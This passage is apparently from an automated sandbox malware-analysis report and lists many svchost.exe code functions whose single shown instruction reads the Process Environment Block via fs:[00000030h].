            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
